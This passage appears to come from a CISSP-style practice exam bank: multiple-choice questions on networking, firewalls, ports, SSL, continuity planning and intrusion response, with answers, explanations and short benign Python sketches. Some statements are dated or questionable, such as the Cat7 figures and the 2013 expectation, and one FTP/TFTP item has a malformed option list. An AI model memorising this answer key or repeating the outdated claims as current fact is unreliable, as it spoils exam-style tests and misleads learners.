One character (known as an escape character) is reserved to mark any occurrence of the special characters within the frame. In this way the receiver is able to identify which characters are part of the frame and which are part of the "framing".
Packet communication over asynchronous links is used by some users to get access to a network using a modem.
Most Wide Area Networks use synchronous links and a more sophisticated link protocol.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 100.
and
http://en.wikipedia.org/wiki/Asynchronous_communication
and
http://www.erg.abdn.ac.uk/users/gorry/course/phy-pages/async.html
and
http://www.ligaturesoft.com/data_communications/async-data-transmission.html
What is a limitation of TCP Wrappers?
It cannot control access to running UDP services.
It stops packets before they reach the application layer, thus confusing some proxy servers.
The hosts.allow/hosts.deny access control system requires a complicated directory tree.
They are too expensive.
TCP Wrappers can control whether a UDP service is started, but it has little control afterwards, because once the UDP daemon is running it can continue to receive datagrams directly without passing back through the wrapper.
The following answers are incorrect:
It stops packets before they reach the application layer, thus confusing some proxy servers. Is incorrect because TCP Wrappers acts as an access control list on incoming connections; it does not confuse proxy servers, so this is not a limitation.
The hosts.allow/hosts.deny access control system requires a complicated directory tree. Is incorrect because only a simple directory tree is involved.
They are too expensive. Is incorrect because TCP Wrapper is considered open source with a BSD licensing scheme.
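To illustrate the kind of connection-time check TCP Wrappers performs, here is a simplified Python sketch. The rule format is a rough stand-in for hosts.allow/hosts.deny entries, not the real hosts_access syntax, and the addresses are invented.

# Simplified allow/deny evaluation at connection time. Real TCP Wrappers reads
# /etc/hosts.allow and /etc/hosts.deny with its own (daemon : client) syntax.
ALLOW_RULES = [("sshd", "192.168.1.")]  # (daemon, client-address prefix)
DENY_RULES = [("ALL", "")]              # deny everything else

def matches(rules, daemon, client_ip):
    return any((d == "ALL" or d == daemon) and client_ip.startswith(prefix)
               for d, prefix in rules)

def connection_allowed(daemon, client_ip):
    # The allow rules are consulted first, then the deny rules, then default allow.
    if matches(ALLOW_RULES, daemon, client_ip):
        return True
    if matches(DENY_RULES, daemon, client_ip):
        return False
    return True

print(connection_allowed("sshd", "192.168.1.10"))  # True
print(connection_allowed("ftpd", "10.0.0.5"))      # False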
Which of the following was developed as a simple mechanism for allowing simple network terminals to load their operating system from a server over the LAN?
DHCP
BootP
DNS
ARP
BootP was developed as a simple mechanism for allowing simple network terminals to load their operating system from a server over the LAN. Over time, it has expanded to allow centralized configuration of many aspects of a host's identity and behavior on the network. Note that DHCP, more complex, has replaced BootP over time.
Source: STREBE, Matthew and PERKINS, Charles, Firewalls 24seven, Sybex 2000, Chapter 4: Sockets and Services from a Security Viewpoint.
Which of the following category of UTP cables is specified to be able to handle gigabit Ethernet (1 Gbps) according to the EIA/TIA-568-B standards?
Category 5e UTP
Category 2 UTP
Category 3 UTP
Category 1e UTP
Categories 1 through 6 are based on the EIA/TIA-568-B standards.
One of the newer wiring types for LANs is CAT5e, an improved version of CAT5 that was originally outside of the standard.
Category | Cable Type     | Bandwidth | Usage / Speed
CAT1     | UTP            |           | Analog voice, Plain Old Telephone System (POTS)
CAT2     | UTP            |           | 4 Mbps on Token Ring, also used on ARCnet networks
CAT3     | UTP, ScTP, STP | 16 MHz    | 10 Mbps
CAT4     | UTP, ScTP, STP | 20 MHz    | 16 Mbps on Token Ring networks
CAT5     | UTP, ScTP, STP | 100 MHz   | 100 Mbps on Ethernet, 155 Mbps on ATM
CAT5e    | UTP, ScTP, STP | 100 MHz   | 1 Gbps (improved version of CAT5, originally outside the standard)
CAT6     | UTP, ScTP, STP | 250 MHz   | 10 Gbps
CAT7     | ScTP, STP      | 600 MHz   | 100 Gbps
Category 6 has a minimum of 250 MHz of bandwidth, allowing 10/100/1000 Mbps use with up to 100 meter cable length, along with 10GbE over shorter distances.
Category 6a or Augmented Category 6 has a minimum of 500 MHz of bandwidth. It is the newest standard and allows up to 10GbE with a length up to 100m.
Category 7 is a future cabling standard that should allow for up to 100GbE over 100 meters of cable. Expected availability is in 2013. It has not been approved as a cable standard, and anyone now selling you Cat. 7 cable is fooling you.
REFERENCES:
http://donutey.com/ethernet.php
http://en.wikipedia.org/wiki/TIA/EIA-568-B
http://en.wikipedia.org/wiki/Category_1_cable
Which of the following is immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length?
Fiber Optic cable
Coaxial cable
Twisted Pair cable
Axial cable
Fiber Optic cable is immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length (up to two kilometers in some cases).
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 72.
The standard server port number for HTTP is which of the following?
81
80
8080
8180
HTTP is Port 80.
Why are coaxial cables called "coaxial"?
it includes two physical channels that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running along the same axis.
it includes one physical channel that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running along the same axis
it includes two physical channels that carries the signal surrounded (after a layer of insulation) by another two concentric physical channels, both running along the same axis.
it includes one physical channel that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running perpendicular and along the different axis
Coaxial cable is called "coaxial" because it includes one physical channel that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running along the same axis.
The outer channel serves as a ground. Many of these cables or pairs of coaxial tubes can be placed in a single outer sheathing and, with repeaters, can carry information for a great distance.
Source: STEINER, Kurt, Telecommunications and Network Security, Version 1, May 2002, CISSP Open Study Group (Domain Leader: skottikus), Page 14.
Which of the following is an IP address that is private (i.e. reserved for internal networks, and not a valid address to use on the Internet)?
10.0.42.5
11.0.42.5
12.0.42.5
13.0.42.5
This is a valid Class A reserved address. For Class A, the reserved addresses are 10.0.0.0 - 10.255.255.255.
The following answers are incorrect:
11.0.42.5 Is incorrect because it is not a Class A reserved address.
12.0.42.5 Is incorrect because it is not a Class A reserved address.
13.0.42.5 Is incorrect because it is not a Class A reserved address.
The private IP address ranges are defined within RFC 1918:
10.0.0.0 - 10.255.255.255 (10.0.0.0/8)
172.16.0.0 - 172.31.255.255 (172.16.0.0/12)
192.168.0.0 - 192.168.255.255 (192.168.0.0/16)
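A quick way to check the answer choices is Python's standard ipaddress module, which already knows the RFC 1918 (and other reserved) ranges:

import ipaddress

for candidate in ["10.0.42.5", "11.0.42.5", "12.0.42.5", "13.0.42.5"]:
    addr = ipaddress.ip_address(candidate)
    print(candidate, "private" if addr.is_private else "public")
# Only 10.0.42.5 falls inside an RFC 1918 range (10.0.0.0/8).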
References:
3Com http://www.3com.com/other/pdfs/infra/corpinfo/en_US/501302.pdf
AIOv3 Telecommunications and Networking Security (page 438)
Frame relay uses a public switched network to provide:
Local Area Network (LAN) connectivity.
Metropolitan Area Network (MAN) connectivity.
Wide Area Network (WAN) connectivity.
World Area Network (WAN) connectivity.
Frame relay uses a public switched network to provide Wide Area Network (WAN) connectivity.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 73.
Which of the following protocols suite does the Internet use?
IP/UDP/TCP
IP/UDP/ICMP/TCP
TCP/IP
IMAP/SMTP/POP3
Transmission Control Protocol/Internet Protocol (TCP/IP) is the common name for the suite of protocols that was developed by the Department of Defense (DoD) in the 1970's to support the construction of the internet. The Internet is based on TCP/IP.
The Internet protocol suite is the networking model and a set of communications protocols used for the Internet and similar networks. It is commonly known as TCP/IP, because its most important protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP), were the first networking protocols defined in this standard. It is occasionally known as the DoD model, because the development of the networking model was funded by DARPA, an agency of the United States Department of Defense.
TCP/IP provides end-to-end connectivity specifying how data should be formatted, addressed, transmitted, routed and received at the destination. This functionality has been organized into four abstraction layers within the DoD Model which are used to sort all related protocols according to the scope of networking involved.
From lowest to highest, the layers are:
The link layer, containing communication technologies for a single network segment (link),
The internet layer, connecting independent networks, thus establishing internetworking,
The transport layer handling process-to-process communication,
The application layer, which interfaces to the user and provides support services.
The TCP/IP model and related protocols are maintained by the Internet Engineering Task Force (IETF).
The following answers are incorrect:
IP/UDP/TCP. This is incorrect; all three are popular protocols, but together they are not the name given to the suite of protocols.
IP/UDP/ICMP/TCP. This is incorrect; all four are among the most commonly used protocols, but they are not what the suite of protocols is called.
IMAP/SMTP/POP3. This is incorrect because they are all email protocols and represent only a few of the protocols included in the TCP/IP suite of protocols.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 5267-5268). Auerbach Publications. Kindle Edition.
http://en.wikipedia.org/wiki/Internet_protocol_suite
Domain Name Service is a distributed database system that is used to map:
Domain Name to IP addresses.
MAC addresses to domain names.
MAC Address to IP addresses.
IP addresses to MAC Addresses.
The Domain Name Service is a distributed database system that is used to map domain names to IP addresses and IP addresses to domain names.
The Domain Name System is maintained by a distributed database system, which uses the client-server model. The nodes of this database are the name servers. Each domain has at least one authoritative DNS server that publishes information about that domain and the name servers of any domains subordinate to it. The top of the hierarchy is served by the root nameservers, the servers to query when looking up (resolving) a TLD.
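A minimal sketch of forward and reverse lookups using Python's standard socket module; the resolver behind these calls ultimately queries the distributed DNS database described above, and the host name is only an example.

import socket

# Forward lookup: domain name -> IP address.
ip = socket.gethostbyname("www.example.com")
print(ip)

# Reverse lookup: IP address -> domain name (requires a PTR record to exist).
try:
    name, aliases, addresses = socket.gethostbyaddr(ip)
    print(name)
except socket.herror:
    print("no reverse (PTR) mapping for", ip)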
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 100.
and
https://en.wikipedia.org/wiki/Domain_Name_System
Which of the following media is MOST resistant to tapping?
microwave.
twisted pair.
coaxial cable.
fiber optic.
Fiber optic is the most resistant to tapping because fiber optic cable uses light to transmit the signal. While some technologies allow the line to be monitored passively, it is very difficult to tap into without detection, so this technology is the MOST resistant to tapping.
The following answers are incorrect:
microwave. Is incorrect because microwave transmissions can be intercepted without detection by anyone in the path of the broadcast.
twisted pair. Is incorrect because it is easy to tap into a twisted pair line.
coaxial cable. Is incorrect because it is easy to tap into a coaxial cable line.
Which of the following is a method of multiplexing data where a communication channel is divided into an arbitrary number of variable bit-rate digital channels or data streams. This method allocates bandwidth dynamically to physical channels having information to transmit?
Time-division multiplexing
Asynchronous time-division multiplexing
Statistical multiplexing
Frequency division multiplexing
Statistical multiplexing is a type of communication link sharing, very similar to dynamic bandwidth allocation (DBA). In statistical multiplexing, a communication channel is divided into an arbitrary number of variable bit-rate digital channels or data streams. The link sharing is adapted to the instantaneous traffic demands of the data streams that are transferred over each channel. This is an alternative to creating a fixed sharing of a link, such as in general time division multiplexing (TDM) and frequency division multiplexing (FDM). When performed correctly, statistical multiplexing can provide a link utilization improvement, called the statistical multiplexing gain.
Generally, the methods for multiplexing data include the following :
Time-division multiplexing (TDM): information from each data channel is allocated bandwidth based on pre-assigned time slots, regardless of whether there is data to transmit. Time-division multiplexing is used primarily for digital signals, but may be applied in analog multiplexing in which two or more signals or bit streams are transferred appearing simultaneously as sub-channels in one communication channel, but are physically taking turns on the channel. The time domain is divided into several recurrent time slots of fixed length, one for each sub-channel. A sample byte or data block of sub-channel 1 is transmitted during time slot 1, sub-channel 2 during time slot 2, etc. One TDM frame consists of one time slot per sub-channel plus a synchronization channel and sometimes error correction channel before the synchronization. After the last sub-channel, error correction, and synchronization, the cycle starts all over again with a new frame, starting with the second sample, byte or data block from sub-channel 1, etc.
Asynchronous time-division multiplexing (ATDM): information from data channels is allocated bandwidth as needed, via dynamically assigned time slots. ATM provides functionality that is similar to both circuit switching and packet switching networks: ATM uses asynchronous time-division multiplexing, and encodes data into small, fixed-sized packets (ISO-OSI frames) called cells. This differs from approaches such as the Internet Protocol or Ethernet that use variable sized packets and frames. ATM uses a connection-oriented model in which a virtual circuit must be established between two endpoints before the actual data exchange begins. These virtual circuits may be “permanent”, i.e. dedicated connections that are usually preconfigured by the service provider, or “switched”, i.e. set up on a per-call basis using signalling and disconnected when the call is terminated.
Frequency division multiplexing (FDM): information from each data channel is allocated bandwidth based on the signal frequency of the traffic. In telecommunications, frequency-division multiplexing (FDM) is a technique by which the total bandwidth available in a communication medium is divided into a series of non-overlapping frequency sub-bands, each of which is used to carry a separate signal. This allows a single transmission medium such as the radio spectrum, a cable or optical fiber to be shared by many signals.
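A toy comparison of fixed TDM slots versus statistical multiplexing; the traffic numbers are invented purely to illustrate the idea of allocating capacity only to channels that have data to send.

# Four sub-channels with bursty demand (units of data queued at this instant).
demand = {"ch1": 5, "ch2": 0, "ch3": 9, "ch4": 0}
LINK_CAPACITY = 12

# TDM: every channel gets a fixed quarter of the link, used or not.
tdm_share = {ch: LINK_CAPACITY // len(demand) for ch in demand}

# Statistical multiplexing: capacity is divided among channels that actually
# have data, proportionally to their demand.
active_total = sum(d for d in demand.values() if d > 0)
stat_share = {ch: (LINK_CAPACITY * d // active_total if d else 0)
              for ch, d in demand.items()}

print("TDM        :", tdm_share)   # idle channels still consume slots
print("Statistical:", stat_share)  # busy channels receive the idle capacity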
Reference used for this question:
http://en.wikipedia.org/wiki/Statistical_multiplexing
and
http://en.wikipedia.org/wiki/Frequency_division_multiplexing
and
Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, Chapter 3: Technical Infrastructure and Operational Practices (page 114).
If any server in the cluster crashes, processing continues transparently, however, the cluster suffers some performance degradation. This implementation is sometimes called a:
server farm
client farm
cluster farm
host farm
If any server in the cluster crashes, processing continues transparently, however, the cluster suffers some performance degradation. This implementation is sometimes called a "server farm."
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 67.
Each data packet is assigned the IP address of the sender and the IP address of the:
recipient.
host.
node.
network.
Each data packet is assigned the IP address of the sender and the IP address of the recipient. The term network refers to the part of the IP address that identifies each network. The terms host and node refer to the parts of the IP address that identify a specific machine on a network.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 87.
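A small sketch showing where those two addresses sit in an IPv4 header: bytes 12-15 carry the source (sender) address and bytes 16-19 the destination (recipient). The header bytes below are hand-built for illustration with documentation addresses.

import socket, struct

def build_demo_header(src, dst):
    # Minimal 20-byte IPv4 header with only the fields needed for this demo.
    return struct.pack("!BBHHHBBH4s4s",
                       0x45, 0, 20, 0, 0, 64, 6, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))

header = build_demo_header("192.0.2.1", "198.51.100.7")
src_bytes, dst_bytes = struct.unpack("!4s4s", header[12:20])
print("sender   :", socket.inet_ntoa(src_bytes))
print("recipient:", socket.inet_ntoa(dst_bytes))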
Why does fiber optic communication technology have significant security advantage over other transmission technology?
Higher data rates can be transmitted.
Interception of data traffic is more difficult.
Traffic analysis is prevented by multiplexing.
Single and double-bit errors are correctable.
It would be correct to select the first answer if the word "security" was not in the question.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following are REGISTERED PORTS as defined by IANA ?
Ports 128 to 255
Ports 1024 to 49151
Ports 1025 to 65535
Ports 1024 to 32767
Ports 1024 to 49151 have been defined as REGISTERED PORTS by IANA.
A registered port is a network port (a sub-address defined within the Internet Protocol, in the range 1–65535) assigned by the Internet Assigned Numbers Authority (IANA) (or by Internet Corporation for Assigned Names and Numbers (ICANN) before March 21, 2001) for use with a certain protocol or application.
Ports with numbers lower than those of the registered ports are called well known ports; ports with numbers greater than those of the registered ports are called dynamic and/or private ports.
Ports 0-1023 - well known ports
Ports 1024-49151 - Registered port: vendors use for applications
Ports >49151 - dynamic / private ports
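A small helper, written here only to illustrate the three IANA ranges listed above, could classify any port number accordingly:

```python
def iana_port_range(port: int) -> str:
    """Classify a TCP/UDP port number according to the IANA ranges listed above."""
    if not 0 <= port <= 65535:
        raise ValueError("port must be between 0 and 65535")
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"

assert iana_port_range(80) == "well-known"         # HTTP
assert iana_port_range(8080) == "registered"       # common HTTP alternate
assert iana_port_range(51515) == "dynamic/private"
```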
The other answers are not correct
Reference(s) used for this question:
http://en.wikipedia.org/wiki/Registered_port
A group of independent servers, which are managed as a single system, that provides higher availability, easier manageability, and greater scalability is:
server cluster
client cluster
guest cluster
host cluster
A server cluster is a group of independent servers, which are managed as a single system, that provides higher availability, easier manageability, and greater scalability.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 67.
How many layers are defined within the US Department of Defense (DoD) TCP/IP Model?
7
5
4
3
The TCP/IP protocol model is similar to the OSI model but it defines only four layers:
Application
Host-to-host
Internet
Network access
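For illustration only, the four DoD layers can be laid out next to a few typical protocols; the exact placement of some protocols (ARP in particular) varies between study guides.

```python
# Illustrative mapping only; protocol placement follows common CISSP study guides.
DOD_TCPIP_LAYERS = {
    "Application":    ["HTTP", "FTP", "SMTP", "DNS"],
    "Host-to-host":   ["TCP", "UDP"],
    "Internet":       ["IP", "ICMP"],
    "Network access": ["Ethernet", "ARP"],
}

for layer, protocols in DOD_TCPIP_LAYERS.items():
    print(f"{layer:<15} {', '.join(protocols)}")
```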
Reference(s) used for this question:
http://www.novell.com/documentation/nw65/ntwk_ipv4_nw/data/hozdx4oj.html
and
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 84).
also see:
http://en.wikipedia.org/wiki/Internet_Protocol_Suite#Layer_names_and_number_of_layers_in_the_literature
A variation of the application layer firewall is called a:
Current Level Firewall.
Cache Level Firewall.
Session Level Firewall.
Circuit Level Firewall.
Terminology can be confusing between the different sources: both the CBK and AIO3 call an application layer firewall a proxy, and proxy servers are generally classified as either circuit-level proxies or application-level proxies.
The distinction is that a circuit level proxy creates a conduit through which a trusted host can communicate with an untrusted one and doesn't really look at the application contents of the packet (as an application level proxy does). SOCKS is one of the better known circuit-level proxies.
Firewalls
Packet Filtering Firewall - First Generation (a minimal rule-matching sketch follows this list)
- Screening Router
- Operates at Network and Transport level
- Examines Source and Destination IP Address
- Can deny based on ACLs
- Can specify Port
Application Level Firewall - Second Generation
- Proxy Server
- Copies each packet from one network to the other
- Masks the origin of the data
- Operates at layer 7 (Application Layer)
- Reduces network performance since it has to analyze each packet and decide what to do with it
- Also called Application Layer Gateway
Stateful Inspection Firewalls - Third Generation
- Packets analyzed at all OSI layers
- Queued at the network level
- Faster than Application Level Gateway
Dynamic Packet Filtering Firewalls - Fourth Generation
- Allows modification of security rules
- Mostly used for UDP
- Remembers all of the UDP packets that have crossed the network's perimeter, and decides whether to enable packets to pass through the firewall
Kernel Proxy - Fifth Generation
- Runs in the NT kernel
- Uses dynamic and custom TCP/IP-based stacks to inspect the network packets and to enforce security policies
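The following Python sketch illustrates the first-generation behaviour described above: a static rule list examined top-down against source address and destination port, with a default deny. The rules and addresses are invented for the example and do not represent any particular product.

```python
import ipaddress

# Each rule: (source prefix, destination port or None for any, action); first match wins.
RULES = [
    (ipaddress.ip_network("10.0.0.0/8"), 22,   "allow"),  # internal hosts may use SSH
    (ipaddress.ip_network("0.0.0.0/0"),  80,   "allow"),  # anyone may reach the web server
    (ipaddress.ip_network("0.0.0.0/0"),  None, "deny"),   # default deny
]

def filter_packet(src_ip: str, dst_port: int) -> str:
    src = ipaddress.ip_address(src_ip)
    for network, port, action in RULES:
        if src in network and (port is None or port == dst_port):
            return action
    return "deny"

print(filter_packet("10.1.2.3", 22))     # allow
print(filter_packet("203.0.113.9", 22))  # deny -- falls through to the default rule
```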
"Current level firewall" is incorrect. This is an amost-right-sounding distractor to confuse the unwary.
"Cache level firewall" is incorrect. This too is a distractor.
"Session level firewall" is incorrect. This too is a distractor.
References
CBK, p. 466 - 467
AIO3, pp. 486 - 490
CISSP Study Notes from Exam Prep Guide
What is the primary difference between FTP and TFTP?
Speed of negotiation
Authentication
Ability to automate
TFTP is used to transfer configuration files to and from network equipment.
TFTP (Trivial File Transfer Protocol) is sometimes used to transfer configuration files from equipment such as routers, but the primary difference between FTP and TFTP is that TFTP does not require authentication. Speed and ability to automate are not important.
Both of these protocols (FTP and TFTP) can be used for transferring files across the Internet. The differences between the two protocols are explained below:
FTP is a complete, session-oriented, general purpose file transfer protocol. TFTP is used as a bare-bones special purpose file transfer protocol.
FTP can be used interactively. TFTP allows only unidirectional transfer of files.
FTP depends on TCP, is connection oriented, and provides reliable control. TFTP depends on UDP, requires less overhead, and provides virtually no control.
FTP provides user authentication. TFTP does not.
FTP uses well-known TCP port numbers: 20 for data and 21 for connection dialog. TFTP uses UDP port number 69 for its file transfer activity.
The Windows NT FTP server service does not support TFTP because TFTP does not support authentication.
Windows 95 and TCP/IP-32 for Windows for Workgroups do not include a TFTP client program.
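The mandatory login step that distinguishes FTP from TFTP can be seen with Python's standard ftplib client; the host name, credentials and file name below are placeholders only.

```python
from ftplib import FTP

# Hypothetical host, credentials and file name. FTP will not serve files until the
# client authenticates, which is the key difference from TFTP (UDP port 69, no login).
with FTP("ftp.example.com") as ftp, open("config.txt", "wb") as out:
    ftp.login(user="alice", passwd="secret")      # authentication is mandatory
    ftp.retrbinary("RETR config.txt", out.write)  # data transfer over TCP
```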
Ref: http://support.microsoft.com/kb/102737
Secure Sockets Layer (SSL) is very heavily used for protecting which of the following?
Web transactions.
EDI transactions.
Telnet transactions.
Electronic Payment transactions.
SSL was developed by Netscape Communications Corporation to improve the security and privacy of HTTP transactions.
SSL is one of the most common protocols used to protect Internet traffic.
It encrypts the messages using symmetric algorithms, such as IDEA, DES, 3DES, and Fortezza, and also calculates the MAC for the message using MD5 or SHA-1. The MAC is appended to the message and encrypted along with the message data.
The exchange of the symmetric keys is accomplished through various versions of Diffie–Hellman or RSA. TLS is the Internet standard based on SSLv3. TLSv1 is backward compatible with SSLv3. It uses the same algorithms as SSLv3; however, it computes an HMAC instead of a MAC along with other enhancements to improve security.
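For illustration, the handshake and negotiated parameters described above can be observed with Python's standard ssl module; www.example.com stands in for any HTTPS server.

```python
import socket
import ssl

# Minimal TLS client handshake; certificate validation is enabled by default.
context = ssl.create_default_context()
with socket.create_connection(("www.example.com", 443)) as sock:
    with context.wrap_socket(sock, server_hostname="www.example.com") as tls:
        print(tls.version())  # e.g. 'TLSv1.3' -- negotiated protocol version
        print(tls.cipher())   # negotiated cipher suite, protocol, and key size
```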
The following are incorrect answers:
"EDI transactions" is incorrect. Electronic Data Interchange (EDI) is not the best answer to this question though SSL could play a part in some EDI transactions.
"Telnet transactions" is incorrect. Telnet is a character mode protocol and is more likely to be secured by Secure Telnet or replaced by the Secure Shell (SSH) protocols.
"Eletronic payment transactions" is incorrect. Electronic payment is not the best answer to this question though SSL could play a part in some electronic payment transactions.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 16615-16619). Auerbach Publications. Kindle Edition.
and
http://en.wikipedia.org/wiki/Transport_Layer_Security
A business continuity plan is an example of which of the following?
Corrective control
Detective control
Preventive control
Compensating control
Business Continuity Plans are designed to minimize the damage done by the event, and facilitate rapid restoration of the organization to its full operational capacity. They are for use "after the fact", thus are examples of corrective controls.
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 8: Business Continuity Planning and Disaster Recovery Planning (page 273).
and
Conrad, Eric; Misenar, Seth; Feldman, Joshua (2012-09-01). CISSP Study Guide (Kindle Location 8069). Elsevier Science (reference). Kindle Edition.
What can be defined as the maximum acceptable length of time that elapses before the unavailability of the system severely affects the organization?
Recovery Point Objectives (RPO)
Recovery Time Objectives (RTO)
Recovery Time Period (RTP)
Critical Recovery Time (CRT)
One of the results of a Business Impact Analysis is a determination of each business function's Recovery Time Objectives (RTO). The RTO is the amount of time allowed for the recovery of a business function. If the RTO is exceeded, then severe damage to the organization would result.
The Recovery Point Objectives (RPO) is the point in time in which data must be restored in order to resume processing.
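A small worked example, using invented figures, shows how the two objectives are checked against an actual backup schedule and recovery estimate:

```python
# Hypothetical figures for one business function.
rto_hours = 4                  # maximum tolerable downtime before severe impact (RTO)
rpo_hours = 1                  # maximum tolerable data loss, measured back in time (RPO)

backup_interval_hours = 0.5    # how often transaction logs are shipped off-site
estimated_recovery_hours = 3   # time needed to rebuild and restore the system

print("RPO met:", backup_interval_hours <= rpo_hours)     # worst-case data loss fits the RPO
print("RTO met:", estimated_recovery_hours <= rto_hours)  # recovery completes within the RTO
```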
Reference(s) used for this question:
BARNES, James C. & ROTHSTEIN, Philip J., A Guide to Business Continuity Planning, John Wiley & Sons, 2001 (page 68).
and
SWANSON, Marianne, & al., National Institute of Standards and Technology (NIST), NIST Special Publication 800-34, Contingency Planning Guide for Information Technology Systems, December 2001 (page 47).
Which element must computer evidence have to be admissible in court?
It must be relevant.
It must be annotated.
It must be printed.
It must contain source code.
To be admissible in court, evidence must be relevant to the case, i.e. it must tend to prove or disprove the facts at issue. Annotation, printing, or the presence of source code are not requirements for admissibility.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following is a large hardware/software backup system that uses the RAID technology?
Tape Array.
Scale Array.
Crimson Array
Table Array.
A Tape Array is a large hardware/software backup system based on the RAID technology.
There is a misconception that RAID can only be used with disks.
All large storage vendors, from HP to EMC to Compaq, offer Tape Arrays based on RAID technology.
This is a VERY common type of storage, at an affordable price as well.
So RAID is not exclusively for disks. Often this is referred to as a Tape Library or simply RAIT.
RAIT (redundant array of independent tapes) is similar to RAID, but uses tape drives instead of disk drives. Tape storage is the lowest-cost option for very large amounts of data, but is very slow compared to disk storage. As in RAID striping, in RAIT, data are striped in parallel to multiple tape drives, with or without a redundant parity drive. This provides the high capacity at low cost typical of tape storage, with higher-than-usual tape data transfer rates and optional data integrity.
References:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 70.
and
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (p. 1271). McGraw-Hill. Kindle Edition.
Which of the following assertions is NOT true about pattern matching and anomaly detection in intrusion detection?
Anomaly detection tends to produce more data
A pattern matching IDS can only identify known attacks
Stateful matching scans for attack signatures by analyzing individual packets instead of traffic streams
An anomaly-based engine develops baselines of normal traffic activity and throughput, and alerts on deviations from these baselines
This statement is false, which makes it the correct choice: stateful matching scans for attack signatures by analyzing traffic streams rather than individual packets. Stateful matching intrusion detection takes pattern matching to the next level.
As networks become faster there is an emerging need for security analysis techniques that can keep up with the increased network throughput. Existing network-based intrusion detection sensors can barely keep up with bandwidths of a few hundred Mbps. Analysis tools that can deal with higher throughput are unable to maintain state between different steps of an attack or they are limited to the analysis of packet headers.
The following answers are all incorrect:
Anomaly detection tends to produce more data is true as an anomaly-based IDS produces a lot of data as any activity outside of expected behavior is recorded.
A pattern matching IDS can only identify known attacks is true as a pattern matching IDS works by comparing traffic streams against signatures. These signatures are created for known attacks.
An anomaly-based engine develops baselines of normal traffic activity and throughput, and alerts on deviations from these baselines is true as the assertion is a characteristic of a statistical anomaly-based IDS.
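As a rough illustration of the anomaly-based approach (not taken from any of the cited products), the sketch below builds a statistical baseline of normal traffic and flags large deviations from it:

```python
import statistics

# Hypothetical baseline: requests per minute observed during normal operation.
baseline = [110, 95, 102, 98, 105, 99, 101, 97, 104, 100]
mean = statistics.mean(baseline)
stdev = statistics.stdev(baseline)

def is_anomalous(observed_rate: float, threshold: float = 3.0) -> bool:
    """Flag traffic that deviates more than `threshold` standard deviations from the baseline."""
    return abs(observed_rate - mean) > threshold * stdev

print(is_anomalous(103))  # False -- within normal variation
print(is_anomalous(450))  # True  -- large deviation, an alert would be generated
```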
When first analyzing an intrusion that has just been detected and confirming that it is a true positive, which of the following actions should be done as a first step if you wish to prosecute the attacker in court?
Back up the compromised systems.
Identify the attacks used to gain access.
Capture and record system information.
Isolate the compromised systems.
When an intrusion has been detected and confirmed, if you wish to prosecute the attacker in court, the following actions should be performed in the following order:
Capture and record system information and evidence that may be lost, modified, or not captured during the execution of a backup procedure. Start with the most volatile memory areas first.
Make at least two full backups of the compromised systems, using hardware-write-protectable or write-once media. A first backup may be used to re-install the compromised system for further analysis and the second one should be preserved in a secure location to preserve the chain of custody of evidence.
Isolate the compromised systems.
Search for signs of intrusions on other systems.
Examine logs in order to gather more information and better identify other systems to which the intruder might have gained access.
Search through logs of compromised systems for information that would reveal the kind of attacks used to gain access.
Identify what the intruder did, for example by analyzing various log files, comparing checksums of known, trusted files to those on the compromised machine and by using other intrusion analysis tools.
Regardless of the exact steps being followed, if you wish to prosecute in a court of law it means you MUST capture the evidence as a first step before it could be lost or contaminated. You always start with the most volatile evidence first.
NOTE:
I have received feedback saying that some other steps may be done such as Disconnecting the system from the network or shutting down the system. This is true. However, those are not choices listed within the 4 choices attached to this question, you MUST avoid changing the question. You must stick to the four choices presented and pick which one is the best out of the four presented.
In real life, Forensic is not always black or white. There are many shades of grey. In real life you would have to consult your system policy (if you have one), get your Computer Incident team involved, and talk to your forensic expert and then decide what is the best course of action.
Reference(s) Used for this question:
http://www.newyorkcomputerforensics.com/learn/forensics_process.php
and
ALLEN, Julia H., The CERT Guide to System and Network Security Practices, Addison-Wesley, 2001, Chapter 7: Responding to Intrusions (pages 273-277).
After a company is out of an emergency state, what should be moved back to the original site first?
Executives
Least critical components
IT support staff
Most critical components
